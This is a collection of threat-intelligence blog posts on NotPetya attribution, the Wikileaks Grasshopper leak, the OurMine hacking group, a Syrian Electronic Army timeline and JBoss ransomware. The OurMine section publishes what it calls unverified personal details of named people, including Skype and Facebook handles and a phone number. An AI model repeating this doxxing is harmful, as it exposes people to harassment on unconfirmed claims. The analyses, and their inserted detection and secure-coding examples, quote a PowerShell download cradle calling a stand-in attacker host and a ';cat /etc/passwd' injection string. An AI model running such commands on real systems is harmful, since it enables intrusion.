NotPetya 2 – Telebots Attribution

This work was done in my free time with my own resources. Imagine what we could do with a team!

The Case For Nation State Attribution
Jonathan Nichols
04 JULY 2017

Executive Summary

Compelling data has been collected which demonstrates that the actor group Telebots (also tracked as Sandworm, Energetic Bear, or BlackEnergy) is behind the #NotPetya (Petya, exPetya, ExPetr, GoldenEye, Nyetya, Diskcoder.C) attack.


Analysts at ESET have painted a compelling picture which demonstrates that the #NotPetya attacks were conducted by the same actors behind the BlackEnergy attacks against the Ukrainian power grid. Their analysis relies on inductive reasoning and probability rather than a single smoking gun. The similarities between the BlackEnergy actors and the NotPetya actors are uncanny to such a degree that it is unlikely any other actor group could have, accidentally or intentionally, conducted the attack with such striking resemblance.

Yesterday I wrote a blog post detailing how the public details of the NotPetya attack were not sufficient to point to an APT. Those facts changed today, July 4th: ESET has published a fantastic report which should remove all but the most cynical of skeptics. Telebots did NotPetya.

A Note on Terminology

The Information Security industry has a problem with terminology. Attackers, Viruses, and methodologies are frequently given different names by each industry group as these defenders vie for supremacy in marketing wars. This is an unfortunate state of affairs. Alas, until a NIST standard exists for uniform adversary naming, we must live in the world we’ve got, not the one we wish to inhabit (But seriously NIST, you’re dropping the ball here). For this report, I am calling this specific attack “NotPetya” to be in line with the most important policy authorities I wish this report to reach (NATO) and I’m labeling the actors “Telebots” to be in line with the analysts who conducted the bulk of the research I will be drawing on for this report. In an attempt to be exhaustive (and in a shameless grab at Search Engine Optimization), here is a current list of known industry names for the attackers and the methodologies:

NotPetya: Petya, exPetya, ExPetr, GoldenEye, Nyetya, Diskcoder.C

Telebots: Sandworm, Energetic Bear*, BlackEnergy*

(*source documents vary on whether Telebots/Sandworm are closely related or identical to the BlackEnergy/Energetic Bear group)

A Note on Analysis

It is relatively simple for a complex adversary to pretend to be an idiot, and it is impossible for an idiot to pretend to be a complex adversary. Due to this immutable fact, it is always good to start with the premise that the hacker you’re analyzing is an idiot. When facts demonstrate this premise to be false, revise the analysis up the food chain until you’ve found a sufficiently complex level of capability to fit the facts. To do otherwise invites trouble for the analyst and the organizations they support. Since all attacks done by idiots can also be done by experts, any analysis which presupposes that the attackers are experts becomes fallacious on its face. You cannot DISPROVE an attack was done by a professional, you can only prove that a professional must have done an attack. A begets B, but B does not always beget A.


Timeline of Events

December 2015 – BlackEnergy (related to Telebots) disrupts the Ukrainian power grid
December 2016 – KillDisk malware used against Ukrainian financial targets; first instance of Telebots using fake ransomware to mask a wiper
January 2017 – First instance of VPN tunnels used to spread the botnet
January 2017 (date approximate) – Telebots incorporate a password stealer, Mimikatz, and PsExec
14 March 2017, 09:30 – Kaspersky reports PetrWrap (Filecoder.NKH), which uses a nearly identical ransom screen
14 April 2017 – Backdoored ZvitPublishedObjects.dll shipped in an M.E.Doc update owned by Telebots
24 April – 10 May 2017 – No known backdoors present in M.E.Doc updates
15 May 2017 – New backdoor compiled (Filecoder.AESNI.C, aka XData)
15 May 2017 – Backdoored ZvitPublishedObjects.dll shipped in an M.E.Doc update owned by Telebots
17 May – 21 June 2017 – No known backdoors present in M.E.Doc updates
18 May 2017 – Filecoder.AESNI.C released (few infections, as no backdoor was present at the time)
22 June 2017 – New backdoor compiled? (ESET's wording is unclear)
22 June 2017 – Backdoored ZvitPublishedObjects.dll shipped in an M.E.Doc update owned by Telebots
27 June 2017, 10:30 UTC – M.E.Doc update spreads NotPetya (Diskcoder.C)


The timeline above demonstrates a clear evolution in capabilities from late 2015 until today. Early on, Telebots is observed developing the technique of using fake ransomware to hide a wiper. They then develop the ability to spread their malware over VPN tunnels, incorporate a password stealer, Mimikatz, and PsExec, and finally compromise the M.E.Doc update process. All of these techniques are present in the NotPetya attack.

Finding one such technique used by a separate hacking group would be a case of correlation. Finding two would be lucky. Finding this many correlating techniques, fitting a timeline that demonstrates a clear evolution in capabilities? Nature is rarely so beautiful as to grace humanity with that level of coincidence.

As this report was being written, the Ukrainian Cyber Police came to the same conclusion. Like me, they borrow heavily from the wonderful work of the people at ESET. (Source:

If you see ESET at a conference, be sure to buy them a beer and thank them for their service to the Western world.


NOTE: I’m doing this on my own free time and without assistance. Please forgive and alert me to any errors, both factual and editorial. If you want a Threat Intelligence analyst on your team, just drop me a line. I would have been happy to have shared this work with a team, with an editor, and under the banner of a team logo.


NotPetya – So Easy Anyone Could Do It


The Case Against Nation State Attribution
Jonathan Nichols
03 JULY 2017

“Never attribute to malice that which is adequately explained by stupidity.” (Hanlon’s Razor)

Executive Summary

The NATO Cooperative Cyber Defence Centre of Excellence states that the NotPetya malware spread through drive-by exploits, compromised software updates, and email phishing attacks. To date, the principal reason for security researchers to believe that the NotPetya attacks were conducted by a nation state is the use of M.E.Doc automatic software updates to seed the NotPetya virus. Outside of this element, researchers have demonstrated multiple elements of this attack which are amateurish, or otherwise unlike behavior typically seen in nation state level threats. New evidence suggests that malicious abuse of M.E.Doc would be trivial for non-state actors. This report reviews NATO’s claim that the attacks are likely attributable to a nation state actor by examining the known public evidence about each of these attack vectors. While many of NATO’s claims are disputed by community experts, they are taken here with the seriousness one should give an entity that could trigger Article 5 (war).

NATO Claim – Drive by, Software Updates, and Phishing

The NATO Cooperative Cyber Defence Centre of Excellence (CCD COE) states that the “global outbreak of NotPetya malware on 27 June 2017 […] can most likely be attributed to a state actor.” (Source: The CCD COE report of 30 June 2017 describes the attack as “complex and expensive enough” that it was unlikely to be the work of a non-state actor, and notes that the ransom collected would not have covered the cost of the operation.

NATO states that the NotPetya malware spread through drive-by exploits, compromised software updates, and email phishing attacks. Of these attack vectors, most security researchers highlight the compromised software updates as being evidence of nation state involvement.

Compromised Software Updates – So Easy Anyone Could Do It

Ukrainian Cyber Police have published that at about 10:30 GMT on Tuesday 27 June 2017, M.E.Doc software on client machines ran a routine automatic update. At that time, the service EZVit.exe connected to the update address with User Agent “medoc1001189” and downloaded 333 kilobytes of data (Source: This event was the initial virus download.


Further analysis of the update server shows that, at the time of this writing (03 July 2017 at 09:48 EST), it has the following services open:

Port 21 – ProFTPD 1.3.4c
Port 22 – OpenSSH 5.4p1
Port 80 – nginx 1.2.7


Notably, this ProFTPD version is vulnerable to CVE-2015-3306 (the mod_copy flaw), which allows trivial, unauthenticated reading and writing of files on the server’s disk. (source: A Metasploit module exists for it. Further testing or forensics would be necessary to establish whether this was the vulnerability used, and this analysis does not claim with any certainty that CVE-2015-3306 was the attack vector. Nonetheless, the exploit is so trivial that any hacker with rudimentary capabilities could use it if mod_copy was enabled. With the ability to write arbitrary files, a rudimentary hacker could overwrite the update file without difficulty.

The potential for trivial attacks is not limited to this one exploit. Multiple exploits exist for all three of these services, and any of them could have been used by non-state actors with little to no hacking experience. The publicly known vulnerabilities for the open ports are as follows:

Getting the Clients to Download the Virus

In the course of this investigation, it was discovered that simply sending an HTTP GET request to the update server on port 80 with the User Agent “medoc1001189” results in the server returning a “download” file. This strongly suggests that no authentication was (or is) required by the M.E.Doc software to receive updates. It is probable that any file downloaded in this manner will be executed by the M.E.Doc auto-updater, so simply writing a virus to the download file may result in the execution of that virus on every M.E.Doc client machine. Fetching updates without authentication is common in itself; the security-relevant question is whether the client verifies a signature on the downloaded file before executing it.
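As an added editorial example (not the post author’s code, nor the Cyber Police’s), here is the proxy-log hunt a defender could run for the fetch described above. It assumes a simplified, constructed proxy-log format; the only facts taken from the write-up are the user agent, the approximate payload size, and the 27 June 10:30 UTC timing. The six-hour window and the 10% size tolerance are assumptions, as are all hosts and addresses in the sample lines.

```python
"""Hunt a web-proxy log for the M.E.Doc update fetch described above.

Added editorial example. The log format is a constructed, simplified one:
<iso-timestamp> <client-ip> <method> <host> <path> <status> <bytes> "<user-agent>"
"""
import re
from datetime import datetime, timedelta, timezone

# Facts from the write-up: the updater identified itself as "medoc1001189",
# the payload was about 333 KB, and it was served at ~10:30 UTC on 27 June 2017.
MEDOC_USER_AGENT = "medoc1001189"
OUTBREAK_START = datetime(2017, 6, 27, 10, 30, tzinfo=timezone.utc)
MALICIOUS_UPDATE_BYTES = 333 * 1024

# Assumptions: how long after the first push to keep looking, and how much
# the logged byte count may differ from 333 KB (headers, compression).
OUTBREAK_WINDOW = timedelta(hours=6)
SIZE_TOLERANCE = 0.10

LINE_RE = re.compile(
    r'^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<host>\S+) (?P<path>\S+) '
    r'(?P<status>\d{3}) (?P<bytes>\d+) "(?P<ua>[^"]*)"$'
)


def parse_line(line):
    """Return a dict for one log line, or None if it does not match the format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.fromisoformat(rec["ts"].replace("Z", "+00:00"))
    rec["status"] = int(rec["status"])
    rec["bytes"] = int(rec["bytes"])
    return rec


def classify(rec):
    """Return the reasons a record deserves a look; [] means nothing to see."""
    reasons = []
    if rec["ua"] != MEDOC_USER_AGENT or rec["status"] != 200:
        return reasons                      # only successful fetches by the updater itself
    if OUTBREAK_START <= rec["ts"] <= OUTBREAK_START + OUTBREAK_WINDOW:
        reasons.append("updater fetch inside the 27 June outbreak window")
    lo = MALICIOUS_UPDATE_BYTES * (1 - SIZE_TOLERANCE)
    hi = MALICIOUS_UPDATE_BYTES * (1 + SIZE_TOLERANCE)
    if lo <= rec["bytes"] <= hi:
        reasons.append("payload size matches the ~333 KB malicious update")
    return reasons


def hunt(lines):
    """Return (client, iso-timestamp, reasons) for every record that is flagged."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = classify(rec)
        if reasons:
            hits.append((rec["client"], rec["ts"].isoformat(), reasons))
    return hits


# Constructed sample lines; the hostnames and addresses are placeholders, not IOCs.
SAMPLE_LOG = [
    '2017-06-26T09:12:03Z 10.0.5.21 GET upd.medoc.example /last.ver 200 412 "medoc1001189"',
    '2017-06-27T10:31:44Z 10.0.5.21 GET upd.medoc.example /download 200 340993 "medoc1001189"',
    '2017-06-27T10:32:10Z 10.0.5.40 GET www.example.org /index.html 200 18211 "Mozilla/5.0"',
    '2017-06-27T11:02:55Z 10.0.5.77 GET upd.medoc.example /download 304 0 "medoc1001189"',
]

if __name__ == "__main__":
    for client, ts, reasons in hunt(SAMPLE_LOG):
        print(client, ts, "; ".join(reasons))
```

Only the second sample line is flagged: it is the updater’s own user agent, a 200 response inside the window, and a byte count within 10% of 333 KB. The 304 on the last line is the normal “nothing new” reply and is ignored, which is the point of filtering on status before looking at size.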

Compromised Software Updates – Conclusion

The attack, as described by security researchers, NATO, and the Ukrainian Cyber Police, is not sufficiently complex to have necessarily been conducted by a nation state actor. To the contrary, the techniques described above use tools that ship with Kali Linux, a free operating system favored as an introductory hacker toolkit.

Drive-by Attack

The drive-by attack described by NATO CCD COE best matches the description of NotPetya being delivered via a fake Microsoft Windows update pop-up on (Source: While some security experts disagree, the website owners themselves have stated that the website served a malicious pop-up ( Pop-ups are routinely blocked by most modern browsers and are not the preferred infection vector for advanced drive-by actors. Further, fake Windows updates in pop-up browser windows are behavior not typically associated with advanced actors; it is usually observed in criminally motivated malvertising campaigns, which tend to target illicit video streaming services. Advanced actors would likely attempt more reliable browser infections and would avoid this type of pop-up. This attack, like the software update attack, betrays the work of an unskilled hacker, not a nation state.


Phishing Attack

The phishing attack described by the NATO CCD COE best matches the description of phishing emails delivering the NotPetya virus through a Word document attachment (Source: Again, some security experts dispute this claim ( Taking NATO at their word, this attack appears to use Order-20062017.doc to leverage CVE-2017-0199, which calls the following PowerShell: “PowerShell -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile(‘hxxp://’, ‘C:\Documents and Settings\Administrator\Application Data\[random_number].exe’);”

Researchers have complained that this research is not replicable. This is potentially because the download host is no longer accessible. As of this writing, respectable research organizations such as Booz Allen Hamilton ( assess myguy.exe to be a potential dropper for NotPetya. Should this analysis change, it would only reduce the complexity of the NotPetya attack, and a reduction in complexity only further reduces the probability that the attack is the work of a nation state.
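As an added editorial example (not the author’s code), here is a parser for the cradle quoted above that turns a logged command line into a structured indicator and counts its red flags: hidden window, drop into a user-writable profile directory, executable destination. The host attacker.example, the file names, the directory list and the “two or more flags” threshold are constructed assumptions.

```python
"""Turn the PowerShell download cradle quoted above into a structured indicator.

Added editorial example. Sample command lines are constructed; attacker.example
is a placeholder host.
"""
import re

# Shape of the quoted cradle:
#   PowerShell -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('<url>', '<path>')
CRADLE_RE = re.compile(
    r"""(?ix)
    powershell(?:\.exe)?\s+                 # the interpreter
    (?P<flags>(?:-\w+(?:\s+\w+)?\s+)*)      # leading switches such as -WindowStyle Hidden
    .*?System\.Net\.WebClient\)\s*\.DownloadFile\(
    \s*['"](?P<url>[^'"]+)['"]\s*,\s*['"](?P<dest>[^'"]+)['"]\s*\)
    """
)

# Destination directories a normal user can write to; dropping an executable
# there is the usual first stage. The list is an assumption; extend as needed.
USER_WRITABLE_HINTS = ("\\application data\\", "\\appdata\\", "\\temp\\", "\\users\\public\\")
EXECUTABLE_SUFFIXES = (".exe", ".dll", ".scr", ".ps1", ".vbs", ".js", ".hta")


def parse_download_cradle(cmdline):
    """Return a dict describing the cradle, or None if the command line is not one."""
    m = CRADLE_RE.search(cmdline)
    if not m:
        return None
    flags = m.group("flags").lower()
    url, dest = m.group("url"), m.group("dest")
    dest_l = dest.lower()
    return {
        "url": url,                                              # as logged (may be defanged)
        "refanged_url": re.sub(r"^hxxp", "http", url, flags=re.I),
        "dest": dest,
        "hidden_window": "windowstyle hidden" in flags,
        "writes_to_user_profile": any(h in dest_l for h in USER_WRITABLE_HINTS),
        "drops_executable": dest_l.endswith(EXECUTABLE_SUFFIXES),
    }


def cradle_score(ioc):
    """Number of independent red flags; two or more is worth an alert (assumed threshold)."""
    return sum(ioc[k] for k in ("hidden_window", "writes_to_user_profile", "drops_executable"))


# Constructed samples: one modelled on the quoted cradle, one benign admin use, one unrelated.
SAMPLE_CMDLINES = [
    "PowerShell -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile("
    "'hxxp://attacker.example/myguy.exe', "
    "'C:\\Documents and Settings\\Administrator\\Application Data\\48213.exe')",
    "powershell.exe (New-Object System.Net.WebClient).DownloadFile("
    "'https://intranet.example/cfg/agent.json', 'C:\\Tools\\agent.json')",
    "notepad.exe C:\\notes.txt",
]

if __name__ == "__main__":
    for cmd in SAMPLE_CMDLINES:
        ioc = parse_download_cradle(cmd)
        print(cradle_score(ioc) if ioc else "-", ioc["refanged_url"] if ioc else cmd)
```

The benign sample scores zero even though it uses the same WebClient.DownloadFile call: the window is visible, the destination is a tools directory, and the file is not executable. Scoring on those three properties rather than on the API name is what keeps an alert on this cradle from firing on every administrator’s script.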

Regardless, the ThreatTrack Security report is the only professional report which matches the details of the NATO CCD COE report. ThreatTrack Security has published the following phishing email:

“TO: target.emailName

ATTACHMENT: Order-20062017.doc

Hello target.emailName,
You will be billed $ 2,273.42 on your Visa card momentarily.
Go through attachment to avoid it.
Password is ex. 6089, 6088

With appreciation!”

This phishing email is rudimentary at best. There are no hallmarks of advanced phishing techniques here, and no indication that the email specifically targeted any user. On the contrary, the unexpanded template variables (target.emailName) are indicative of a rudimentary hacker and betray none of the qualities expected of nation state level adversaries.

The NotPetya Virus – Malice or Idiocy?

Much has been made of the fact that the NotPetya virus appears to have been designed as a wiper and not as a genuine piece of ransomware. The virus also checks for avp.exe (Kaspersky Antivirus) and wipes the boot sector of any device on which that file is present. (Source: In the course of running, the virus wipes the Master Boot Record, reboots the machine, encrypts the machine, writes a decryption key to a readme.txt file on the C drive, then displays a ransom message.

The ransom message itself contains a decryption key which is entirely randomly generated and is not the encryption key written to readme.txt! The virus either accidentally or maliciously writes over its own ability to decrypt itself. This behavior is being attributed to malice on the part of the designer. However, what has been attributed to malice could just as easily be attributed to poor coding. Why would a coder write one ransom message and decryption key to readme.txt and then generate a random fake decryption key for an entirely new ransom message to be displayed to the user? This duplication of effort is not the sign of a professional nation state adversary. It is entirely plausible, and within the confines of Hanlon’s Razor, that the actors are so amateur as not to know that the ransomware module they used had already written a ransom message to readme.txt. Further, the specific targeting of Kaspersky Antivirus harks back to the vindictive nature of low-level cyber criminals, such as those who famously write hate messages to Kaspersky and Brian Krebs regularly.

$10,000 – Not Enough Cash to be Worth the Effort?

As of this writing, the Bitcoin wallet used for this attack holds 3.99 BTC, or $10,092.15 at the current exchange rate (Source: While this is not a significant windfall for a nation state actor, it would be a sizeable return for an actor observed expending only a few days’ effort and a handful of known vulnerabilities. Without evidence of sufficient technical complexity, it seems inappropriate to assess $10,000 for a weekend’s work as “not worth it” to any moderately capable individual or small group. This is especially true if the actor comes from a country with a low GDP.


There is not sufficient evidence in the current publicly available corpus of knowledge to state that this attack must have been conducted by a nation state actor. No publicly known data point demonstrates a demand for skills above those of a 400 lb hacker with a small amount of cash and a copy of Kali Linux.

However, the inability to find data which confirms that the attack was necessarily the work of a nation state does not preclude the possibility that it was. It is relatively simple for a complex adversary to pretend to be an idiot, and impossible for an idiot to pretend to be a complex adversary. Complexity revealed in future reports may, over time and with more robust forensics, demonstrate that this was an APT. At this time, however, there is not sufficient public data to prove that is the case.

Stories are circulating that NATO is debating whether to consider this attack an act of war. (Source: We should urge moderation and accuracy in our analysis. I, for one, have a distaste for wars started on faulty premises.

-Jon (@WvuAlphaSoldier)


BONUS FLOW CHART! (Seriously, I need a copy of Visio….)


What is Grasshopper? -A Wikileaks Vault7 Story

It’s that time again. Wikileaks has published another set of documents allegedly stolen from the CIA. This time, the documents detail the use of a tool named Grasshopper. Let’s try to get ahead of the media cycle and explain, in plain English, what Grasshopper is.

“Grasshopper appears to be a .exe builder which simplifies the process of identifying and deploying malicious code on a target machine.”


What does that mean? Essentially, Grasshopper automates the process of developing an executable file which will run on a victim machine. This isn’t special. Any child hacker will know that Metasploit will do this for you, for free, without having to join the CIA or anything! If you’re so inclined, you can totally pretend you’re a superspy, here:

Building an executable by hand is tough, but with an executable builder, it’s super easy! Just pick the victim from a list, identify what is running on the victim machine, and a menu will guide you through the process of identifying the right Vulnerabilities, Exploits, and Payloads you can use against that machine. It’s Hacking for Dummies! No more messy “learning how to code” needed!

To go into detail, we gotta get technical. I have to explain to you a bit about the fundamentals of malware. For malware to work, you need to have a Vulnerability, an Exploit, and a Payload.

Vulnerability: A flaw in a piece of code. These are usually introduced accidentally by programmers. After one too many late-night coding sessions, a coder inadvertently misplaces a semicolon or forgets to sanitize a user input. Let’s say a programmer for some server made a user login page without any basic sanity checks, and it looks kinda like this:

Technical bits:

(Note to coders: I know! Don’t write me. Trying to keep this basic.)

Exploit: This is the code that leverages the vulnerability. Let’s look at the above function. A hacker may write a script that takes advantage of the lack of input sanitization. Instead of entering a user name, the hacker may type something like ;cat /etc/passwd. Let me break it down:

Technical bits:
; = “ESCAPE!” (ends the current command; whatever follows runs as a new one)
cat = “DISPLAY”
/etc/passwd = “the file listing every user account on this machine” (the password hashes themselves live in /etc/shadow on a modern system, but the trick works the same way)

So when that UserInput function above is run, the computer sees:

Next thing you know, the hacker has your password file.
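The snippet the post showed as an image is not reproduced here, so as an added editorial example (not the author’s code) here is a Python stand-in for it: a login-style handler that shells out with the raw username, beside the shlex-quoted stop-gap and the no-shell, allowlisted fix. The greeting command and the hostile input are constructed; the injected command is a harmless echo, but the post’s ;cat /etc/passwd lands in exactly the same place.

```python
"""Command injection: the post's bug, a quoted stop-gap, and the real fix.

Added editorial example in Python (the post's snippet was an image). The
"login" shells out to greet the user; the hostile input is constructed.
"""
import re
import shlex
import subprocess

# Allowlist for a POSIX-style account name; anything else is rejected outright.
USERNAME_RE = re.compile(r"[A-Za-z_][A-Za-z0-9_.-]{0,31}")


def greet_vulnerable(username):
    """The bug: user input is glued into a shell command line, so ';' ends the
    command and whatever follows runs as a new one."""
    command = "echo Welcome, " + username            # no sanity check at all
    return subprocess.run(command, shell=True, capture_output=True, text=True).stdout


def greet_quoted(username):
    """Stop-gap when a shell is unavoidable: shlex.quote turns the input into a
    single shell word, so ';' is just a character inside an argument."""
    command = "echo Welcome, " + shlex.quote(username)
    return subprocess.run(command, shell=True, capture_output=True, text=True).stdout


def greet_safe(username):
    """The fix: validate against an allowlist, then pass an argument vector with
    no shell in the picture. The OS execs 'echo' with three literal arguments."""
    if not USERNAME_RE.fullmatch(username):
        raise ValueError("username contains characters outside the allowlist")
    return subprocess.run(["echo", "Welcome,", username],
                          capture_output=True, text=True).stdout


# Constructed hostile input. The injected command is a harmless echo here;
# the post's ';cat /etc/passwd' would be executed in exactly the same way.
HOSTILE = "bob; echo INJECTED"

if __name__ == "__main__":
    print(greet_vulnerable(HOSTILE), end="")   # two lines: the greeting, then INJECTED
    print(greet_quoted(HOSTILE), end="")       # one line, the ';' rendered harmless
    print(greet_safe("bob"), end="")
```

The vulnerable version prints the greeting and then INJECTED on its own line, proving the second command ran. Quoting is an improvement but still hands attacker-controlled text to a shell parser; the argument-vector form plus an allowlist is what you want in new code, because there is no parser left for the input to escape from.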

Payload: This is the part most people traditionally think of as “malware.” It could be nearly anything, and is somewhat dependent on the type of vulnerability. A vulnerability which allows root-level remote code execution can run almost anything; a vulnerability which only allows a hacker to read the contents of memory won’t allow any code execution at all. If the vulnerability allows local code execution, you can execute the payload locally (while sitting at the machine). If the vulnerability allows remote code execution, you can run the payload remotely against the vulnerable machine sitting on the internet. A hacker’s payload could be a wiper (erases a hard drive, like what the Iranians have been deploying against the Saudis), ransomware (famously deployed against hospitals), a trojan (used to allow a hacker to gain remote access), a keylogger (usually deployed by parents or jealous former lovers), or even just an everyday spambot (used to try to sell you garbage).


1) Apply at
2) Go through years of rigorous training
3) Pass an insane background check
4) Get specialized training for Grasshopper
5) Deploy to a crappy part of the world
6) Find a target machine
7) Identify what is running on that machine
8) Using a set of easily navigated menus, use Grasshopper to select what type of Windows machine the victim has, then select a vulnerability likely to work against the victim, then select what kind of payload you want to run on the machine. Save a copy of Totally_Not_Spying.exe
9) Sneak in and run Totally_Not_Spying.exe on the target machine
10) Try to escape without getting charged for espionage and beheaded by some cut-rate dictator

OR….just watch this Youtube video:

That’s right kids! All the functionality Wikileaks just told you the CIA has… yep, you have it too. Just download Metasploit and follow one of the innumerable guides posted on YouTube and, just like that, you’ve skipped all that difficult polygraph stuff the CIA would have made you do!

A note on Wikileaks

Thus far, Wikileaks’ #Vault7 dumps have failed to impress. No one should be surprised that the CIA hacks targets. Most Americans would rightly be upset if the CIA stayed in the stone age.

I continue to wait for Wikileaks to demonstrate something spectacular. Do they have evidence that the CIA engages in bulk data collection? Do they have evidence that the CIA has been holding onto critical bugs (like a heartbleed level vulnerability?) No? Or maybe they do, but haven’t published it yet. THOSE would be notable. To date, Wikileaks has only demonstrated that spies sometimes spy. This isn’t remarkable, and neither are the techniques they’ve demonstrated, to date.

Until next time! Bye for now!

-Jonathan Nichols

OurMine Team

(Originally Authored on July 27th, 2016)

Much media attention has been paid to “OurMine Team”, a group of hackers on a recent hacking spree against high-profile accounts. Those attacked include Daniel Ek (CEO of Spotify), Mark Zuckerberg, Channing Tatum, former Twitter CEOs Dick Costolo and Ev Williams, Twitter co-founder Biz Stone, and YouTubers PewDiePie, Markiplier, Deadmau5, and David Guetta. The group claims to be security researchers who are hacking these accounts to demonstrate vulnerabilities. The group has set up a website selling services priced from $30 to $5,000.

This group is well known to researchers. It was founded in 2014 as a group of low-level Saudi Arabian hackers playing on the OurMine Minecraft forums. The group gained attention in July 2015 when it conducted DDoS attacks against a number of financial institutions. Before then, @Our_Mine was known for taking over the accounts of gamers, stealing over 2,000 Euros’ worth of PS4 FIFA coins (used for in-game purchases). The group is believed to be relatively unskilled. In 2015, the group was observed attempting to pay for Instagram account takeovers. The group is believed to be using off-the-shelf, low-level hacking tools in its attacks.

The group also has a “theme song” of considerable production quality, which can be found here: The song appears to have been sung by Lindee Link, a song writer from Georgia, USA.

The following is unverified PII for the OurMine Team

Related Accounts:

Member: Snake

Name: Abdulhakeem Zatar





Whois information: Admin Name: OurMine Snake

Member: A_Body

Name : Alsheikh Ahmed

Google+ :

Email :

Skype : Alsheikh.Ahmed3

Location : Saudi Arabia

Facebook : /alsheikh.ahmed.3

Website :

Member: Makki

Name : Ahmad Makki

Skype :  a.m.bukari

Location : Saudi Arabia

Instagram : @0AhmadMakki0

Facebook : /ahmad.adnan.3990

Phone : +966.0540087109

Email :

Related websites

Related Pastebin entries:

Additional Sources:

The Syrian Electronic Army Timeline You Wish You Had

(Originally Created in 2013)

Timeline of Events

25NOV09 – The first instance of a defacement by SyRiAn_34G13, the future administrator of the SEA’s website.

19APR10 – First instance of Th3 Pr0 hacking with T34M Err0r

25DEC10 – First instance of Reza_0o0, an Iranian hacker who may have assisted with the early development of the SEA

APR11 – created

24APR11 – Th3 Pr0 conducts an interview with Tartous2day.com

05MAY11 – registered

07MAY11 – “under construction”

11MAY11 – First post on

11MAY11 – First YouTube video, “Directed by Ibrahem Melhem”

12MAY11 – First attack claim on

13MAY11 – Iranian hacker “Reza_0o0” defaces websites which are re-defaced by SEA weeks later

17MAY11 – The SEA claims over 50 websites “attacked” with DDoS or defacement

18MAY11 – Development of Syrian Hacker School at

22MAY11 – Interview with SEA leader on Syrian television

27MAY11 – @SyrianSoldier1 becomes the official SEA Twitter handle

MAY11 – Th3 Pr0 and AKA Dr. Hana Noura claim attack on

MAY11 – Th3 Pr0 and SaQer SyRia claim attack on

MAY11 – ArabAttack claims defacement at and

MAY11 – SY Team claims defacement at

30MAY11 – publishes a report on SEA

04JUN11 – 122 domains hacked. Note: Mass defacements are conducted

04JUN11 – Re-defacements of websites hacked by Reza_0o0 on 13MAY11

04JUN11 – 6 “top Israeli websites” hacked (they were not significant websites) for “Naksa Day”

07JUN11 – Israeli websites defaced and server data deleted “as a revenge from Facebook which keeps removing our pages”

12JUN11 – SEA claims hacks on two more Israeli websites

15JUN11 – SEA claims hack on Center for Small Business in Israel

19JUN11 – Israeli Chemical Society Hack

20JUN11 – Syrian President Bashar al-Assad recognizes SEA in a speech

20JUN11 – SEA begins compromising anti-regime Facebook pages (17 compromises as of 23JUN)

24JUN11 – SEA hacks the French embassy in Damascus. The website redirects to

25JUN11 – 10 Israeli websites hacked by SEA

11JUL11 – Haidara Suleiman, the son of a Syrian intelligence officer, identifies himself as a member of the SEA

15JUL11 – First instance of found on

26SEP11 – SEA hacks Harvard University’s home page. This attack is frequently cited by Western media sources as “the first hack” conducted by the group.

30JAN12 – SEA hacks Al Jazeera

26APR12 – SEA hacks LinkedIn blog

05JUL12 – SEA hacks @AJStream

03AUG12 – SEA hacks Reuters Twitter and blog

05SEP12 – SEA sends fake SMS messages from Al-Jazeera feed

09JAN13 – SEA hacks Saudi Arabian Defense website

05FEB13 – SEA hacks Haaretz email server

05FEB13 – SEA hacks Israeli Ministry of Transportation

07FEB13 – SEA hacks Sky News Arabia Twitter and Facebook accounts

27FEB13 – SEA hacks Agence France Presse

02MAR13 – SEA hacks Qatar Foundation Twitter and Facebook accounts

05MAR13 – SEA hacks France 24 news site and Twitter feed

08MAR13 – SEA provides interview to E-HackNews

18MAR13 – SEA hacks Human Rights Watch Twitter and web site

22MAR13 – SEA hacks BBC Twitter Account

16APR13 – SEA hacks NPR

23APR13 – SEA hacks AP Twitter feed, causing stock market drop

29APR13 – SEA hacks 11 Guardian Twitter accounts

02MAY13 – SEA Twitter account purportedly hacked by AnonymousOwn3r

05MAY13 – E! Online hacked by SEA

06MAY13 – SEA hacks The Onion

17MAY13 – SEA hacks Financial Times Twitter Account and Blog

19MAY13 – SEA claims hack of Saudi Arabian Ministry of Defense e-mail system

21MAY13 – SEA hacks Daily Telegraph

25MAY13 – SEA hacks ITV

26MAY13 – SEA hacks Sky News

31MAY13 – ISP for SEA website takes website offline

03JUN13 – SEA hacks Saudi Arabian newspaper Sabq

04JUN13 – SEA hacks Turkish Ministry of Interior

02JUL13 – SEA website returns

17JUL13 – SEA hacks TrueCaller; the attack is believed to have been launched to disrupt rebel communications in Syria

21JUL13 – SEA hacks TangoMe; the attack is believed to have been launched to disrupt rebel communications in Syria

23JUL13 – SEA hacks DailyDot

23JUL13 – SEA hacks Viber; the attack is believed to have been launched to disrupt rebel communications in Syria

29JUL13 – SEA hacks

01AUG13 – SEA threatens Twitter

16AUG13 – SEA hacks Outbrain; numerous news websites affected

22AUG13 – SEA hacks ShareThis

27AUG13 – SEA hacks MelbourneIT, takes ownership of New York Times, Huffington Post, and Twitter DNS entries.

31AUG13 – SEA VPS data leaked on Tor darkweb

03SEP13 – SEA hacks


Some Extra Details on Hospital Ransomware You (Probably) Didn’t Know

(Originally Authored March 31st, 2016)

Greetings, internet! I’m here to tell you the story of hospital ransomware, Samsam.exe, and the latest vulnerability which should have everyone running to patch their enterprise systems.

Tl;dr – JBoss is vulnerable and is being actively exploited. Patch it or get infected with ransomware. After you fix that, search for everything that uses the Apache Commons Collections Java library and make sure it isn’t vulnerable to the same crap. Many products bundle commons-collections, and while they may not be targeted now, they will be!

We were warned. We didn’t listen.

On January 28th, 2015, AppSecCali presenters Gabriel Lawrence (@gebl) and Chris Frohoff (@frohoff) gave a talk titled “Marshalling Pickles” which details “how deserializing objects can ruin your day[1].” Deserialization (or unserialization) vulnerabilities are a class of bug rooted in how object serialization works in a programming language. Serialization is the process of converting in-memory objects into another format (usually binary) for storage or for transfer over a network; deserialization rebuilds the objects from that format.

Vulnerabilities exist when developers accept serialized data from an untrusted source and deserialize it inside a program: the stream can be crafted so that the deserializer instantiates classes, and runs code, that the developer never intended. The AppSecCali team demonstrated proofs of concept and released ysoserial.jar[2].

